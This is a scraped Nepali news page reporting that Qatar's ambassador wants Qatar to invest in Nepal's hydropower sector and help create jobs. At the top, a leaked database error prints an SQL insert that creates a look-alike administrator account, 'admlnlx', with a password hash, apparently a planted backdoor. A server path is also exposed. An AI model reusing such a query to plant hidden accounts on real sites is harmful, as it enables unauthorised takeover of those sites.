WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1U.Kqybjtlc1iuY4VNM6YwRCOqry11', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 12:05:01', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
कतार नेपालको जलविद्युतमा लगानी गर्न इच्छुक – Gaule Khabar

कतार नेपालको जलविद्युतमा लगानी गर्न इच्छुक

कतार नेपालको जलविद्युतमा लगानी गर्न इच्छुक

काठमाडौँ, मंसिर २०-

 

कतार नेपालको जल विद्युत क्षेत्रमा लगानी गर्न इच्छुक देखिएको छ । कतारका राजदुत युसूफ महोम्मद अलीले नेपाल चेम्बर अफ कमर्सका पदाधिकारीसँगको भेटमा नेपालको जलविद्युत क्षेत्रको विकासमा लगानी गर्न आफनो मुलुक इच्छुक रहेको बताए ।

काठमाडौको जमलस्थित चेम्बर अफ कर्मसको भवनमा सोमबार भएको भेटवार्ता दुई देशबीच हुने व्यापारका विविध क्षेत्रको विषयमा छलफल भएको थियो । राजदुत अलीसँगको भेट पछि संचारकर्मीसँग कुरा गर्दै नेपाल नेम्वर अव कमर्सका अध्यक्ष राजेशकाजी श्रेष्ठले कतार नेपालको जलविद्युत क्षेत्रमा लगानी गर्न इच्छुक रहेको बताए ।

उनले नेपाली कामदारलाई स्वदेशमै काम गर्ने अवसर सृजना गर्न पनि कतारले सहयोग गर्न सक्ने भन्दै राजदुत अलिको ध्यानाकर्षण गराइएको पनि जानकारी दिए ।

कतार नेपाली कामदारलाई रोजगारी दिने मुलुकहरुकेा अग्रपंक्तिमा पर्दछ । राजदुत अलिले नेपालमै रोजगारीकेा अवसर सृजना गर्न नेपालका व्यापारीहरुसँग आवश्यक परामर्श गर्ने प्रतिवद्धता पनि व्यक्त गर्नु गरे ।

कतारले नेपालको जलविद्युत क्षेत्रको लगानीका लागि आवश्यक छलफल गर्न एक कम्पनीलाई नेपाल पठाउने तयारी गरेको चेम्बर अफ कमर्सका अध्यक्ष श्रेष्ठले जानकारी दिए ।

कतारले नेपाली कामदारलाई उच्च प्राथमिकता दिँदै रोजगारीको अवसर प्रदान गरेपछि नेपाल नेम्बर अफ कमर्सले त्यहाँको लगानी भित्रयाउन द्धिपक्षीय छलफललाई निरन्तरता दिँदै आएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका